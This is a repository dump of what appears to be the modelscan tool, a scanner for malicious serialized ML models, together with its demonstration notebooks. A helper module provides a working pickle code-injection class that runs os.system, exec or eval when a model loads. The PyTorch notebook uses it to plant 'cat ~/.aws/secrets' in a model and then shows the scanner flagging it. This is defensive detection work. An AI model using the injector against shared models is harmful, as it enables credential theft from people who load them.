magic.startswith(_ZIP_PREFIX) or magic.startswith(_ZIP_SUFFIX): 214 | # .npz file 215 | return ScanResults( 216 | [], 217 | [], 218 | [ 219 | ModelScanSkipped( 220 | scan_name, 221 | SkipCategories.NOT_IMPLEMENTED, 222 | "Scanning of .npz files is not implemented yet", 223 | str(model.get_source()), 224 | ) 225 | ], 226 | ) 227 | 228 | elif magic == np.lib.format.MAGIC_PREFIX: 229 | # .npy file 230 | version = np.lib.format.read_magic(stream) # type: ignore[no-untyped-call] 231 | np.lib.format._check_version(version) # type: ignore[attr-defined] 232 | _, _, dtype = np.lib.format._read_array_header(stream, version) # type: ignore[attr-defined] 233 | 234 | if dtype.hasobject: 235 | return scan_pickle_bytes(model, settings, scan_name, True, stream.tell()) 236 | else: 237 | return ScanResults([], [], []) 238 | else: 239 | return scan_pickle_bytes(model, settings, scan_name) 240 | 241 | 242 | def scan_pytorch(model: Model, settings: Dict[str, Any]) -> ScanResults: 243 | scan_name = "pytorch" 244 | should_read_directly = _should_read_directly(model.get_stream()) 245 | if should_read_directly and model.get_stream().tell() == 0: 246 | # try loading from tar 247 | try: 248 | # TODO: implement loading from tar 249 | raise TarError() 250 | except TarError: 251 | # file does not contain a tar 252 | model.get_stream().seek(0) 253 | 254 | magic = get_magic_number(model.get_stream()) 255 | if magic != MAGIC_NUMBER: 256 | return ScanResults( 257 | [], 258 | [], 259 | [ 260 | ModelScanSkipped( 261 | scan_name, 262 | SkipCategories.MAGIC_NUMBER, 263 | "Invalid magic number", 264 | str(model.get_source()), 265 | ) 266 | ], 267 | ) 268 | 269 | return scan_pickle_bytes(model, settings, scan_name, multiple_pickles=False) 270 | -------------------------------------------------------------------------------- /modelscan/tools/utils.py: -------------------------------------------------------------------------------- 1 | import io 2 | from pathlib import Path 3 | from pickletools import genops # nosec 4 | from typing import IO, Optional, Union 5 | 6 | 7 | class InvalidMagicError(Exception): 8 | def __init__(self, provided_magic: Optional[int], magic: int, file: str): 9 | self.provided_magic = provided_magic 10 | self.magic = magic 11 | self.file = file 12 | super().__init__() 13 | 14 | def __str__(self) -> str: 15 | return f"{self.file}: {self.provided_magic} != {self.magic}" 16 | 17 | 18 | # copied from pytorch code 19 | # https://github.com/pytorch/pytorch/blob/664058fa83f1d8eede5d66418abff6e20bd76ca8/torch/serialization.py#L28 20 | MAGIC_NUMBER = 0x1950A86A20F9469CFC6C 21 | 22 | 23 | # copied from pytorch code 24 | # https://github.com/pytorch/pytorch/blob/664058fa83f1d8eede5d66418abff6e20bd76ca8/torch/serialization.py#L272 25 | def _is_compressed_file(f: IO[bytes]) -> bool: 26 | compress_modules = ["gzip"] 27 | try: 28 | return f.__module__ in compress_modules 29 | except AttributeError: 30 | return False 31 | 32 | 33 | # copied from pytorch code 34 | # https://github.com/pytorch/pytorch/blob/664058fa83f1d8eede5d66418abff6e20bd76ca8/torch/serialization.py#L280 35 | def _should_read_directly(f: IO[bytes]) -> bool: 36 | """ 37 | Checks if f is a file that should be read directly. It should be read 38 | directly if it is backed by a real file (has a fileno) and is not a 39 | a compressed file (e.g. gzip) 40 | """ 41 | if _is_compressed_file(f): 42 | return False 43 | try: 44 | return f.fileno() >= 0 45 | except io.UnsupportedOperation: 46 | return False 47 | except AttributeError: 48 | return False 49 | 50 | 51 | # copied from pytorch code 52 | # https://github.com/pytorch/pytorch/blob/0b3316ad2c6ff61416597ef29e8865876dcb12f5/torch/serialization.py#L66 53 | def _is_zipfile(source: Union[Path, str], data: Optional[IO[bytes]] = None) -> bool: 54 | # This is a stricter implementation than zipfile.is_zipfile(). 55 | # zipfile.is_zipfile() is True if the magic number appears anywhere in the 56 | # binary. Since we expect the files here to be generated by torch.save or 57 | # torch.jit.save, it's safe to only check the start bytes and avoid 58 | # collisions and assume the zip has only 1 file. 59 | # See bugs.python.org/issue28494. 60 | if not data: 61 | data = open(source, "rb") 62 | file = True 63 | else: 64 | file = False 65 | 66 | # Read the first 4 bytes of the file 67 | read_bytes = [] 68 | start = data.tell() 69 | 70 | byte = data.read(1) 71 | while byte != b"": 72 | read_bytes.append(byte) 73 | if len(read_bytes) == 4: 74 | break 75 | byte = data.read(1) 76 | data.seek(start) 77 | if file: 78 | data.close() 79 | 80 | local_header_magic_number = [b"P", b"K", b"\x03", b"\x04"] 81 | return read_bytes == local_header_magic_number 82 | 83 | 84 | def get_magic_number(data: IO[bytes]) -> Optional[int]: 85 | try: 86 | for opcode, args, _pos in genops(data): 87 | if "INT" in opcode.name or "LONG" in opcode.name: 88 | data.seek(0) 89 | return int(args) # type: ignore[arg-type] 90 | except ValueError: 91 | return None 92 | return None 93 | -------------------------------------------------------------------------------- /notebooks/README.md: -------------------------------------------------------------------------------- 1 | # Notebooks demonstarting Model Serialization Attacks 2 | 3 | To learn more about model serialization attacks, please see [Model Serialization Attacks](../docs/model_serialization_attacks.md). 4 | 5 | In the notebooks directory, the notebooks included focus on model serialization attack on a particular ML library. We carry out a stealth mock exfiltration attack. Stealth, because the model still works as before the attack. Mock, because we don't actually carry out an exfiltration attack but show a POC where it can be carried out. 6 | 7 | In addition to demonstrate the model serialization attacks, the safe and unsafe modelscan results are also outlined. The ML libraries covered are: 8 | 9 |

10 | # PyTorch 11 | Pytorch models can be saved and loaded using pickle. modelscan can scan models saved using pickle. A notebook to illustrate the following is added. 12 | 13 | - Exfiltrate AWS secret on a PyTorch model using `os.system()` 14 | - modelscan usage and expected scan results with safe and unsafe PyTorch models 15 | 16 | 📓 Notebook:[pytorch_sentiment_analysis.ipynb](pytorch_sentiment_analysis.ipynb) 17 | 18 | 🔗 Model: [cardiffnlp/twitter-roberta-base-sentiment](https://huggingface.co/cardiffnlp/twitter-roberta-base-sentiment) 19 | 20 |

21 | # Tensorflow 22 | Tensorflow uses saved_model for model serialization. modelscan can scan models saved using saved_model. A notebook to illustrate the following is added. 23 | 24 | - Exfiltrate AWS secret on a Tensorflow model `tf.io.read_file()` and `tf.io.write_file()` 25 | - ModelScan usage and expected scan results with safe and unsafe tensorflow models 26 | 27 | 📓 Notebook: [tensorflow_fashion_mnist.ipynb](./tensorflow_fashion_mnist.ipynb) 28 | 29 | 🔗 Model: Classification of fashion mnist dataset. [Reference to Tensorflow tutorial](https://www.tensorflow.org/tutorials/keras/classification). 30 | 31 |

32 | # Keras 33 | Keras uses saved_model and h5 for model serialization. A notebook to illustrate the following is added. 34 | 35 | - Exfiltrate AWS secret on a Keras model using `keras.layers.lambda()` 36 | - ModelScan usage and expected scan results with safe and unsafe Keras models 37 | 38 | 📓 Notebook: [keras_fashion_mnist.ipynb](./keras_fashion_mnist.ipynb). 39 | 40 | 🔗 Model: Classification of fashion mnist dataset. [Reference to Tensorflow tutorial](https://www.tensorflow.org/tutorials/keras/classification). 41 | 42 |

43 | # Classical ML libraries 44 | 45 | modelscan also supports all ML libraries that support pickle for their model serialization, such as Sklearn, XGBoost, Catboost etc. A notebook to illustrate the following is added. 46 | 47 | - Exfiltrate AWS secret on a XGBoost model using `os.system()` 48 | - ModelScan usage and expected scan results with safe and unsafe XGBoost models 49 | 50 | 📓 Notebook: [xgboost_diabetes_classification.ipynb](./xgboost_diabetes_classification.ipynb) 51 | 52 | 🔗 Model: Classification of diabetes. [Link to PIMA Indian diabetes dataset](https://www.kaggle.com/datasets/uciml/pima-indians-diabetes-database) 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /notebooks/pytorch_sentiment_analysis.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "markdown", 5 | "metadata": {}, 6 | "source": [ 7 | "# Setup " 8 | ] 9 | }, 10 | { 11 | "cell_type": "markdown", 12 | "metadata": {}, 13 | "source": [ 14 | "## Installing ModelScan" 15 | ] 16 | }, 17 | { 18 | "cell_type": "code", 19 | "execution_count": 1, 20 | "metadata": {}, 21 | "outputs": [ 22 | { 23 | "name": "stdout", 24 | "output_type": "stream", 25 | "text": [ 26 | "Note: you may need to restart the kernel to use updated packages.\n", 27 | "modelscan, version 0.0.0\n" 28 | ] 29 | } 30 | ], 31 | "source": [ 32 | "%pip install -q modelscan\n", 33 | "!modelscan -v" 34 | ] 35 | }, 36 | { 37 | "cell_type": "code", 38 | "execution_count": 2, 39 | "metadata": {}, 40 | "outputs": [ 41 | { 42 | "name": "stdout", 43 | "output_type": "stream", 44 | "text": [ 45 | ] 46 | } 47 | ], 48 | "source": [ 49 | "%pip install -q torch==2.0.1\n", 50 | "%pip install -q transformers==4.31.0\n", 51 | "%pip install -q scipy==1.11.1" 52 | ] 53 | }, 54 | { 55 | "cell_type": "code", 56 | "execution_count": 4, 57 | "metadata": {}, 58 | "outputs": [ 59 | { 60 | "name": "stdout", 61 | "output_type": "stream", 62 | "text": [ 63 | "env: TOKENIZERS_PARALLELISM=false\n" 64 | ] 65 | } 66 | ], 67 | "source": [ 68 | "import torch\n", 69 | "import os\n", 70 | "from utils.pytorch_sentiment_model import download_model, predict_sentiment\n", 71 | "from utils.pickle_codeinjection import PickleInject, get_payload\n", 72 | "\n", 73 | "%env TOKENIZERS_PARALLELISM=false" 74 | ] 75 | }, 76 | { 77 | "cell_type": "markdown", 78 | "metadata": {}, 79 | "source": [ 80 | "# Saving Model\n", 81 | "\n", 82 | "\n", 83 | "The BERT based sentiment analysis PyTorch model used in the notebook can be found at https://huggingface.co/cardiffnlp/twitter-roberta-base-sentiment. The safe model is saved at `./PyTorchModels/safe_model.pt`" 84 | ] 85 | }, 86 | { 87 | "cell_type": "code", 88 | "execution_count": 5, 89 | "metadata": {}, 90 | "outputs": [], 91 | "source": [ 92 | "# Save a model for sentiment analysis\n", 93 | "from typing import Final\n", 94 | "\n", 95 | "model_directory: Final[str] = \"PyTorchModels\"\n", 96 | "if not os.path.isdir(model_directory):\n", 97 | " os.mkdir(model_directory)\n", 98 | "\n", 99 | "safe_model_path = os.path.join(model_directory, \"safe_model.pt\")\n", 100 | "\n", 101 | "download_model(safe_model_path)" 102 | ] 103 | }, 104 | { 105 | "cell_type": "markdown", 106 | "metadata": {}, 107 | "source": [ 108 | "# Safe Model Prediction" 109 | ] 110 | }, 111 | { 112 | "cell_type": "code", 113 | "execution_count": 6, 114 | "metadata": {}, 115 | "outputs": [ 116 | { 117 | "name": "stdout", 118 | "output_type": "stream", 119 | "text": [ 120 | "The overall sentiment is: negative with a score of: 85.9%\n" 121 | ] 122 | } 123 | ], 124 | "source": [ 125 | "sentiment = predict_sentiment(\n", 126 | " \"Stock market was bearish today\", torch.load(safe_model_path)\n", 127 | ")" 128 | ] 129 | }, 130 | { 131 | "cell_type": "markdown", 132 | "metadata": {}, 133 | "source": [ 134 | "# Scan Safe Model\n", 135 | "\n", 136 | "The scan results include information on the files scanned, and any issues if found. For the safe model scanned, modelscan finds no model serialization attacks, as expected." 137 | ] 138 | }, 139 | { 140 | "cell_type": "code", 141 | "execution_count": 7, 142 | "metadata": {}, 143 | "outputs": [ 144 | { 145 | "name": "stdout", 146 | "output_type": "stream", 147 | "text": [ 148 | "No settings file detected at /Users/mehrinkiani/Documents/modelscan/notebooks/modelscan-settings.toml. Using defaults. \n", 149 | "\n", 150 | "Scanning /Users/mehrinkiani/Documents/modelscan/notebooks/PyTorchModels/safe_model.pt:safe_model/data.pkl using modelscan.scanners.PickleUnsafeOpScan model scan\n", 151 | "\n", 152 | "\u001b[34m--- Summary ---\u001b[0m\n", 153 | "\n", 154 | "\u001b[32m No issues found! 🎉\u001b[0m\n" 155 | ] 156 | } 157 | ], 158 | "source": [ 159 | "!modelscan --path PyTorchModels/safe_model.pt" 160 | ] 161 | }, 162 | { 163 | "cell_type": "markdown", 164 | "metadata": {}, 165 | "source": [ 166 | "# Model Serialization Attack\n", 167 | "\n", 168 | "Here malicious code is injected in the safe model to read aws secret keys. The unsafe model is saved at `./PyTorchModels/unsafe_model.pt`" 169 | ] 170 | }, 171 | { 172 | "cell_type": "code", 173 | "execution_count": 8, 174 | "metadata": {}, 175 | "outputs": [], 176 | "source": [ 177 | "command = \"system\"\n", 178 | "malicious_code = \"\"\"cat ~/.aws/secrets\n", 179 | " \"\"\"\n", 180 | "\n", 181 | "unsafe_model_path = os.path.join(model_directory, \"unsafe_model.pt\")\n", 182 | "\n", 183 | "payload = get_payload(command, malicious_code)\n", 184 | "torch.save(\n", 185 | " torch.load(safe_model_path),\n", 186 | " f=unsafe_model_path,\n", 187 | " pickle_module=PickleInject([payload]),\n", 188 | ")" 189 | ] 190 | }, 191 | { 192 | "cell_type": "markdown", 193 | "metadata": {}, 194 | "source": [ 195 | "# Unsafe Model Prediction\n", 196 | "\n", 197 | "The malicious code injected in the unsafe model gets executed when it is loaded. The aws secret keys are displayed. \n", 198 | "\n", 199 | "Also, the unsafe model predicts the sentiments just as well as safe model i.e., the code injection attack will not impact the model performance. The unaffected performance of unsafe models makes the ML models an effective attack vector. \n" 200 | ] 201 | }, 202 | { 203 | "cell_type": "code", 204 | "execution_count": 9, 205 | "metadata": {}, 206 | "outputs": [ 207 | { 208 | "name": "stderr", 209 | "output_type": "stream", 210 | "text": [ 211 | "aws_access_key_id=\n", 212 | "aws_secret_access_key=\n", 213 | "The overall sentiment is: negative with a score of: 85.9%\n" 214 | ] 215 | } 216 | ], 217 | "source": [ 218 | "predict_sentiment(\"Stock market was bearish today\", torch.load(unsafe_model_path))" 219 | ] 220 | }, 221 | { 222 | "cell_type": "markdown", 223 | "metadata": {}, 224 | "source": [ 225 | "# Scan Unsafe Model\n", 226 | "\n", 227 | "The scan results include information on the files scanned, and any issues if found. In this case, a critical severity level issue is found in the unsafe model scanned. \n", 228 | "\n", 229 | "modelscan also outlines the found operator(s) and module(s) deemed unsafe. " 230 | ] 231 | }, 232 | { 233 | "cell_type": "code", 234 | "execution_count": 10, 235 | "metadata": {}, 236 | "outputs": [ 237 | { 238 | "name": "stdout", 239 | "output_type": "stream", 240 | "text": [ 241 | "No settings file detected at /Users/mehrinkiani/Documents/modelscan/notebooks/modelscan-settings.toml. Using defaults. \n", 242 | "\n", 243 | "Scanning /Users/mehrinkiani/Documents/modelscan/notebooks/PyTorchModels/unsafe_model.pt:unsafe_model/data.pkl using modelscan.scanners.PickleUnsafeOpScan model scan\n", 244 | "\n", 245 | "\u001b[34m--- Summary ---\u001b[0m\n", 246 | "\n", 247 | "Total Issues: \u001b[1;36m1\u001b[0m\n", 248 | "\n", 249 | "Total Issues By Severity:\n", 250 | "\n", 251 | " - LOW: \u001b[1;32m0\u001b[0m\n", 252 | " - MEDIUM: \u001b[1;32m0\u001b[0m\n", 253 | " - HIGH: \u001b[1;32m0\u001b[0m\n", 254 | " - CRITICAL: \u001b[1;36m1\u001b[0m\n", 255 | "\n", 256 | "\u001b[34m--- Issues by Severity ---\u001b[0m\n", 257 | "\n", 258 | "\u001b[34m--- CRITICAL ---\u001b[0m\n", 259 | "\n", 260 | "Unsafe operator found:\n", 261 | " - Severity: CRITICAL\n", 262 | " - Description: Use of unsafe operator 'system' from module 'posix'\n", 263 | " - Source: /Users/mehrinkiani/Documents/modelscan/notebooks/PyTorchModels/unsafe_model.pt:unsafe_model/data.pkl\n" 264 | ] 265 | } 266 | ], 267 | "source": [ 268 | "!modelscan --path ./PyTorchModels/unsafe_model.pt" 269 | ] 270 | }, 271 | { 272 | "cell_type": "markdown", 273 | "metadata": {}, 274 | "source": [ 275 | "# Reporting Format\n", 276 | "ModelScan can report scan results in console (default), json, or custom report (to be defined by user in settings-file). For mode details, please see: ` modelscan -h` " 277 | ] 278 | }, 279 | { 280 | "cell_type": "markdown", 281 | "metadata": {}, 282 | "source": [ 283 | "## JSON Report\n", 284 | "\n", 285 | "For JSON reporting: `modelscan -p ./path-to/file -r json -o output-file-name.json` " 286 | ] 287 | }, 288 | { 289 | "cell_type": "code", 290 | "execution_count": 11, 291 | "metadata": {}, 292 | "outputs": [ 293 | { 294 | "name": "stdout", 295 | "output_type": "stream", 296 | "text": [ 297 | "No settings file detected at /Users/mehrinkiani/Documents/modelscan/notebooks/modelscan-settings.toml. Using defaults. \n", 298 | "\n", 299 | "Scanning /Users/mehrinkiani/Documents/modelscan/notebooks/PyTorchModels/unsafe_model.pt:unsafe_model/data.pkl using modelscan.scanners.PickleUnsafeOpScan model scan\n", 300 | "\u001b[1m{\u001b[0m\u001b[32m\"modelscan_version\"\u001b[0m: \u001b[32m\"0.5.0\"\u001b[0m, \u001b[32m\"timestamp\"\u001b[0m: \u001b[32m\"2024-01-25T17:10:54.306065\"\u001b[0m, \n", 301 | "\u001b[32m\"input_path\"\u001b[0m: \n", 302 | "\u001b[32m\"/Users/mehrinkiani/Documents/modelscan/notebooks/PyTorchModels/unsafe_model.pt\"\u001b[0m\n", 303 | ", \u001b[32m\"total_issues\"\u001b[0m: \u001b[1;36m1\u001b[0m, \u001b[32m\"summary\"\u001b[0m: \u001b[1m{\u001b[0m\u001b[32m\"total_issues_by_severity\"\u001b[0m: \u001b[1m{\u001b[0m\u001b[32m\"LOW\"\u001b[0m: \u001b[1;36m0\u001b[0m, \n", 304 | "\u001b[32m\"MEDIUM\"\u001b[0m: \u001b[1;36m0\u001b[0m, \u001b[32m\"HIGH\"\u001b[0m: \u001b[1;36m0\u001b[0m, \u001b[32m\"CRITICAL\"\u001b[0m: \u001b[1;36m1\u001b[0m\u001b[1m}\u001b[0m\u001b[1m}\u001b[0m, \u001b[32m\"issues_by_severity\"\u001b[0m: \u001b[1m{\u001b[0m\u001b[32m\"CRITICAL\"\u001b[0m: \n", 305 | "\u001b[1m[\u001b[0m\u001b[1m{\u001b[0m\u001b[32m\"description\"\u001b[0m: \u001b[32m\"Use of unsafe operator 'system' from module 'posix'\"\u001b[0m, \n", 306 | "\u001b[32m\"operator\"\u001b[0m: \u001b[32m\"system\"\u001b[0m, \u001b[32m\"module\"\u001b[0m: \u001b[32m\"posix\"\u001b[0m, \u001b[32m\"source\"\u001b[0m: \n", 307 | "\u001b[32m\"/Users/mehrinkiani/Documents/modelscan/notebooks/PyTorchModels/unsafe_model.pt:\u001b[0m\n", 308 | "\u001b[32munsafe_model/data.pkl\"\u001b[0m, \u001b[32m\"scanner\"\u001b[0m: \u001b[32m\"modelscan.scanners.PickleUnsafeOpScan\"\u001b[0m\u001b[1m}\u001b[0m\u001b[1m]\u001b[0m\u001b[1m}\u001b[0m, \n", 309 | "\u001b[32m\"errors\"\u001b[0m: \u001b[1m[\u001b[0m\u001b[1m]\u001b[0m, \u001b[32m\"scanned\"\u001b[0m: \u001b[1m{\u001b[0m\u001b[32m\"total_scanned\"\u001b[0m: \u001b[1;36m1\u001b[0m, \u001b[32m\"scanned_files\"\u001b[0m: \n", 310 | "\u001b[1m[\u001b[0m\u001b[32m\"/Users/mehrinkiani/Documents/modelscan/notebooks/PyTorchModels/unsafe_model.pt\u001b[0m\n", 311 | "\u001b[32m:unsafe_model/data.pkl\"\u001b[0m\u001b[1m]\u001b[0m\u001b[1m}\u001b[0m\u001b[1m}\u001b[0m\n" 312 | ] 313 | } 314 | ], 315 | "source": [ 316 | "# This will save the scan results in file: pytorch-model-scan-results.json\n", 317 | "!modelscan --path ./PyTorchModels/unsafe_model.pt -r json -o pytorch-model-scan-results.json" 318 | ] 319 | } 320 | ], 321 | "metadata": { 322 | "kernelspec": { 323 | "display_name": "Python 3.10.13 ('py310')", 324 | "language": "python", 325 | "name": "python3" 326 | }, 327 | "language_info": { 328 | "codemirror_mode": { 329 | "name": "ipython", 330 | "version": 3 331 | }, 332 | "file_extension": ".py", 333 | "mimetype": "text/x-python", 334 | "name": "python", 335 | "nbconvert_exporter": "python", 336 | "pygments_lexer": "ipython3", 337 | "version": "3.10.14" 338 | }, 339 | "vscode": { 340 | "interpreter": { 341 | "hash": "bd638e2064d9001d4ca93bc8e56e039dad230900dd235e8a6196f1614960903a" 342 | } 343 | } 344 | }, 345 | "nbformat": 4, 346 | "nbformat_minor": 2 347 | } 348 | -------------------------------------------------------------------------------- /notebooks/utils/pickle_codeinjection.py: -------------------------------------------------------------------------------- 1 | from __future__ import annotations 2 | 3 | import os 4 | import pickle 5 | import struct 6 | 7 | 8 | class PickleInject: 9 | """Pickle injection. Pretends to be a "module" to work with torch.""" 10 | 11 | def __init__(self, inj_objs, first=True): 12 | self.__name__ = "pickle_inject" 13 | self.inj_objs = inj_objs 14 | self.first = first 15 | 16 | class _Pickler(pickle._Pickler): 17 | """Reimplementation of Pickler with support for injection""" 18 | 19 | def __init__(self, file, protocol, inj_objs, first=True): 20 | super().__init__(file, protocol) 21 | self.inj_objs = inj_objs 22 | self.first = first 23 | 24 | def dump(self, obj): 25 | """Pickle data, inject object before or after""" 26 | if self.proto >= 2: 27 | self.write(pickle.PROTO + struct.pack("= 4: 29 | self.framer.start_framing() 30 | 31 | # Inject the object(s) before the user-supplied data? 32 | if self.first: 33 | # Pickle injected objects 34 | for inj_obj in self.inj_objs: 35 | self.save(inj_obj) 36 | 37 | # Pickle user-supplied data 38 | self.save(obj) 39 | 40 | # Inject the object(s) after the user-supplied data? 41 | if not self.first: 42 | # Pickle injected objects 43 | for inj_obj in self.inj_objs: 44 | self.save(inj_obj) 45 | 46 | self.write(pickle.STOP) 47 | self.framer.end_framing() 48 | 49 | def Pickler(self, file, protocol): 50 | # Initialise the pickler interface with the injected object 51 | return self._Pickler(file, protocol, self.inj_objs) 52 | 53 | class _PickleInject: 54 | """Base class for pickling injected commands""" 55 | 56 | def __init__(self, args, command=None): 57 | self.command = command 58 | self.args = args 59 | 60 | def __reduce__(self): 61 | return self.command, (self.args,) 62 | 63 | class System(_PickleInject): 64 | """Create os.system command""" 65 | 66 | def __init__(self, args): 67 | super().__init__(args, command=os.system) 68 | 69 | class Exec(_PickleInject): 70 | """Create exec command""" 71 | 72 | def __init__(self, args): 73 | super().__init__(args, command=exec) 74 | 75 | class Eval(_PickleInject): 76 | """Create eval command""" 77 | 78 | def __init__(self, args): 79 | super().__init__(args, command=eval) 80 | 81 | class RunPy(_PickleInject): 82 | """Create runpy command""" 83 | 84 | def __init__(self, args): 85 | import runpy 86 | 87 | super().__init__(args, command=runpy._run_code) 88 | 89 | def __reduce__(self): 90 | return self.command, (self.args, {}) 91 | 92 | 93 | def get_payload( 94 | command: str, malicious_code: str 95 | ) -> PickleInject.System | PickleInject.Exec | PickleInject.Eval | PickleInject.RunPy: 96 | """ 97 | Get the payload based on the command and malicious code provided. 98 | 99 | Args: 100 | command: The command to execute. 101 | malicious_code: The malicious code to inject. 102 | 103 | Returns: 104 | The payload object based on the command. 105 | 106 | Raises: 107 | ValueError: If an invalid command is provided. 108 | """ 109 | if command == "system": 110 | payload = PickleInject.System(malicious_code) 111 | elif command == "exec": 112 | payload = PickleInject.Exec(malicious_code) 113 | elif command == "eval": 114 | payload = PickleInject.Eval(malicious_code) 115 | elif command == "runpy": 116 | payload = PickleInject.RunPy(malicious_code) 117 | else: 118 | raise ValueError("Invalid command provided.") 119 | 120 | return payload 121 | 122 | 123 | def generate_unsafe_file( 124 | safe_model, command: str, malicious_code: str, unsafe_model_path: str 125 | ) -> None: 126 | payload = get_payload(command, malicious_code) 127 | pickle_protocol = 4 128 | file_for_unsafe_model = open(unsafe_model_path, "wb") 129 | mypickler = PickleInject._Pickler(file_for_unsafe_model, pickle_protocol, [payload]) 130 | mypickler.dump(safe_model) 131 | file_for_unsafe_model.close() 132 | -------------------------------------------------------------------------------- /notebooks/utils/pytorch_sentiment_model.py: -------------------------------------------------------------------------------- 1 | from typing import Any, Final 2 | from transformers import AutoModelForSequenceClassification 3 | from transformers import AutoTokenizer 4 | import numpy as np 5 | from scipy.special import softmax 6 | import csv 7 | import urllib.request 8 | import torch 9 | 10 | SENTIMENT_TASK: Final[str] = "sentiment" 11 | 12 | 13 | def _preprocess(text: str) -> str: 14 | """ 15 | Preprocess the given text by replacing usernames starting with '@' with '@user' 16 | and replacing URLs starting with 'http' with 'http'. 17 | 18 | Args: 19 | text: The input text to be preprocessed. 20 | 21 | Returns: 22 | The preprocessed text. 23 | """ 24 | new_text: list[str] = [] 25 | 26 | for t in text.split(" "): 27 | t = "@user" if t.startswith("@") and len(t) > 1 else t 28 | t = "http" if t.startswith("http") else t 29 | new_text.append(t) 30 | return " ".join(new_text) 31 | 32 | 33 | def download_model(safe_model_path: str) -> None: 34 | """ 35 | Download a pre-trained model and saves it to the specified path. 36 | 37 | Args: 38 | safe_model_path: The path where the model will be saved. 39 | """ 40 | pretrained_model_name = f"cardiffnlp/twitter-roberta-base-{SENTIMENT_TASK}" 41 | model = AutoModelForSequenceClassification.from_pretrained(pretrained_model_name) 42 | torch.save(model, safe_model_path) 43 | 44 | 45 | def predict_sentiment(text: str, model: Any) -> None: 46 | """ 47 | Predict the sentiment of a given text using a pre-trained sentiment analysis model. 48 | 49 | Args: 50 | text: The input text to analyze. 51 | model: The sentiment analysis model. 52 | """ 53 | pretrained_model_name = "cardiffnlp/twitter-roberta-base-sentiment" 54 | tokenizer = AutoTokenizer.from_pretrained(pretrained_model_name) 55 | 56 | text = _preprocess(text) 57 | encoded_input = tokenizer(text, return_tensors="pt") 58 | output = model(**encoded_input) 59 | scores = output[0][0].detach().numpy() 60 | scores = softmax(scores) 61 | 62 | labels: list[str] = [] 63 | mapping_link = f"https://raw.githubusercontent.com/cardiffnlp/tweeteval/main/datasets/{SENTIMENT_TASK}/mapping.txt" 64 | with urllib.request.urlopen(mapping_link) as f: 65 | html = f.read().decode("utf-8").split("\n") 66 | csvreader = csv.reader(html, delimiter="\t") 67 | labels = [row[1] for row in csvreader if len(row) > 1] 68 | 69 | ranking = np.argsort(scores) 70 | ranking = ranking[::-1] 71 | 72 | print( 73 | f"The overall sentiment is: {labels[ranking[0]]} with a score of: {np.round(float(scores[ranking[0]])*100, 1)}%" 74 | ) 75 | -------------------------------------------------------------------------------- /notebooks/utils/tensorflow_codeinjection.py: -------------------------------------------------------------------------------- 1 | import tensorflow as tf 2 | 3 | 4 | class MaliciousModule(tf.keras.Model): 5 | def __init__(self, safe_model): 6 | super(MaliciousModule, self).__init__() 7 | self.model = safe_model 8 | 9 | @tf.function( 10 | input_signature=[tf.TensorSpec(shape=(None, 28, 28), dtype=tf.float32)] 11 | ) 12 | def call(self, x): 13 | # Some model prediction logic 14 | res = self.model(x) 15 | 16 | # Write a file 17 | tf.io.write_file( 18 | "/tmp/aws_secret.txt", 19 | "aws_access_key_id=\naws_secret_access_key=", 20 | ) 21 | 22 | list_ds = tf.data.Dataset.list_files("/tmp/*.txt", shuffle=False) 23 | 24 | for file in list_ds: 25 | tf.print("File found: " + file) 26 | tf.print(tf.io.read_file(file)) 27 | 28 | return res 29 | -------------------------------------------------------------------------------- /notebooks/utils/tensorflow_fashion_mnist_model.py: -------------------------------------------------------------------------------- 1 | import tensorflow as tf 2 | import numpy as np 3 | import matplotlib.pyplot as plt 4 | 5 | tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR) 6 | 7 | 8 | class_names = [ 9 | "T-shirt/top", 10 | "Trouser", 11 | "Pullover", 12 | "Dress", 13 | "Coat", 14 | "Sandal", 15 | "Shirt", 16 | "Sneaker", 17 | "Bag", 18 | "Ankle boot", 19 | ] 20 | 21 | 22 | def get_data(test_data_only=False): 23 | fashion_mnist = tf.keras.datasets.fashion_mnist 24 | (train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data() 25 | train_images = train_images / 255.0 26 | test_images = test_images / 255.0 27 | 28 | if test_data_only: 29 | return test_images, test_labels 30 | else: 31 | return train_images, train_labels, test_images, test_labels 32 | 33 | 34 | def plot_image(pred, img): 35 | plt.grid(False) 36 | plt.xticks([]) 37 | plt.yticks([]) 38 | 39 | plt.imshow(img, cmap=plt.cm.binary) 40 | plt.xlabel("{}".format(pred), color="blue") 41 | 42 | 43 | def train_model(): 44 | model = tf.keras.Sequential( 45 | [ 46 | tf.keras.layers.Flatten(input_shape=(28, 28)), 47 | tf.keras.layers.Dense(128, activation="relu"), 48 | tf.keras.layers.Dense(10), 49 | tf.keras.layers.Softmax(), 50 | ] 51 | ) 52 | 53 | model.compile( 54 | optimizer="adam", 55 | loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=False), 56 | metrics=["accuracy"], 57 | ) 58 | 59 | train_images, train_labels, test_images, test_labels = get_data() 60 | 61 | model.fit(train_images, train_labels, epochs=10) 62 | 63 | _, test_acc = model.evaluate(test_images, test_labels, verbose=1) 64 | 65 | print("\nModel trained with test accuracy:", test_acc) 66 | 67 | return model 68 | 69 | 70 | def get_predictions(model, number_of_predictions): 71 | get_test_data_only = True 72 | test_images, test_labels = get_data(get_test_data_only) 73 | 74 | model_output = model.predict(test_images[0:number_of_predictions]) 75 | prediction_probabilities = [np.max(prob) for prob in model_output] 76 | prediction_labels = [class_names[np.argmax(pred)] for pred in model_output] 77 | print( 78 | f"\nThe model predicts: {prediction_labels} with probabilities: {np.round(prediction_probabilities,5)*100}" 79 | ) 80 | true_labels = [class_names[label] for label in test_labels[0:number_of_predictions]] 81 | print(f"\nThe true labels are {true_labels}") 82 | plot_predictions( 83 | number_of_predictions, test_images[0:number_of_predictions], prediction_labels 84 | ) 85 | 86 | return None 87 | 88 | 89 | def plot_predictions(number_of_predictions, test_data, model_predictions): 90 | for index in range(0, number_of_predictions): 91 | plt.subplot(1, number_of_predictions, index + 1) 92 | plot_image(model_predictions[index], test_data[index]) 93 | -------------------------------------------------------------------------------- /notebooks/utils/xgboost_diabetes_model.py: -------------------------------------------------------------------------------- 1 | from numpy import loadtxt 2 | from xgboost import XGBClassifier 3 | from sklearn.model_selection import train_test_split 4 | 5 | 6 | def get_data(): 7 | dataset = loadtxt("utils/pima-indians-diabetes.csv", delimiter=",") 8 | X = dataset[:, 0:8] 9 | Y = dataset[:, 8] 10 | # split data into train and test sets 11 | 